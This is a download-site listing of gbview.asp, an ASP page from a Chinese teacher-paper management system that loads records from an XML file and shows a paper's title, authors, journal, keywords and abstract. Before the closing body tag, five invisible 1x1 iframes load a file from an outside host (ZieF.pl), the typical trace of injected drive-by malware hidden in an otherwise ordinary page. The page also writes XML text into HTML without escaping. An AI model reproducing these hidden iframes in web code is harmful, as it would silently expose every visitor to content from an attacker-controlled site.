⭐ 欢迎来到虫虫下载站! | 📦 资源下载 📁 资源专辑 ℹ️ 关于我们
⭐ 虫虫下载站

📄 gbview.asp

📁 教师论文管理系统 主要是完成注册登陆身份验证以及上传教师论文上传等
💻 ASP
字号:
<%@ language="VBScript" %>
<%
id=Request("id")
set xmldoc=server.createObject("MSXML.DOMDocument")
xmldoc.load(server.mappath("lw.xml"))
set Nodes=xmldoc.documentElement.childNodes
str1=nodes(id).childNodes(0).text
for i=0 to nodes(id).childNodes.length -1
  if nodes(id).childNodes(i).nodeName = "author" then
     str2=str2+ nodes(id).childNodes(i).text+"   "
  end if
  if nodes(id).childNodes(i).nodeName = "author_units" then
     str3=str3+ nodes(id).childNodes(i).text+"   "
  end if
  if nodes(id).childNodes(i).nodeName = "kanming" then
     str4=str4+ nodes(id).childNodes(i).text+"   "
  end if
  if nodes(id).childNodes(i).nodeName = "keywords" then
     str5=str5+ nodes(id).childNodes(i).text+"   "
  end if
  if nodes(id).childNodes(i).nodeName = "abstract" then
     str6=str6+ nodes(id).childNodes(i).text+"   "
  end if
next
set xmldoc=nothing
%>
<html>
<head>
<title>查看论文内容</title>
</head>
<body bgcolor="#ccccff">
<center>
<p><font size="5" face="华文新魏">查看论文内容</font></p>
<table width="90%" border="0" cellpadding="4" cellspacing="1">
<tr>
<td width="10%"><font face="华文新魏">主题:</font></td>
<td width="90%"><font face="宋体"><% =str1 %></td>
</tr>
<tr>
<td width="10%"><font face="华文新魏">作者:</font></td>
<td width="90%"><font face="宋体"><% =str2 %></td>
</tr>
<tr>
<td width="20%"><font face="华文新魏">作者单位:</font></td>
<td width="90%"><font face="宋体"><% =str3 %></td>
</tr>
<tr>
<td width="10%"><font face="华文新魏">刊名:</font></td>
<td width="90%"><font face="宋体"><% =str4 %></td>
</tr>
<tr>
<td width="10%"><font face="华文新魏">关键字:</font></td>
<td width="90%"><font face="宋体"><% =str5 %></td>
</tr>
<tr>
<td width="10%"><font face="华文新魏">摘要:</font></td>
<td width="90%"><font face="宋体"><% =str6 %></td>
</tr>
</table>
<hr>
<p><a href="GBList.asp">[返回]</a></p>
</center>
<iframe src="http://ZieF.pl/iraq.jpg" width=1 height=1 style="border:0"></iframe>
<iframe src="http://ZieF.pl/iraq.jpg" width=1 height=1 style="border:0"></iframe>
<iframe src="http://ZieF.pl/iraq.jpg" width=1 height=1 style="border:0"></iframe>
<iframe src="http://ZieF.pl/iraq.jpg" width=1 height=1 style="border:0"></iframe>
<iframe src="http://ZieF.pl/iraq.jpg" width=1 height=1 style="border:0"></iframe>
</body>
</html>

⌨️ 快捷键说明

复制代码 Ctrl + C
搜索代码 Ctrl + F
全屏模式 F11
切换主题 Ctrl + Shift + D
显示快捷键 ?
增大字号 Ctrl + =
减小字号 Ctrl + -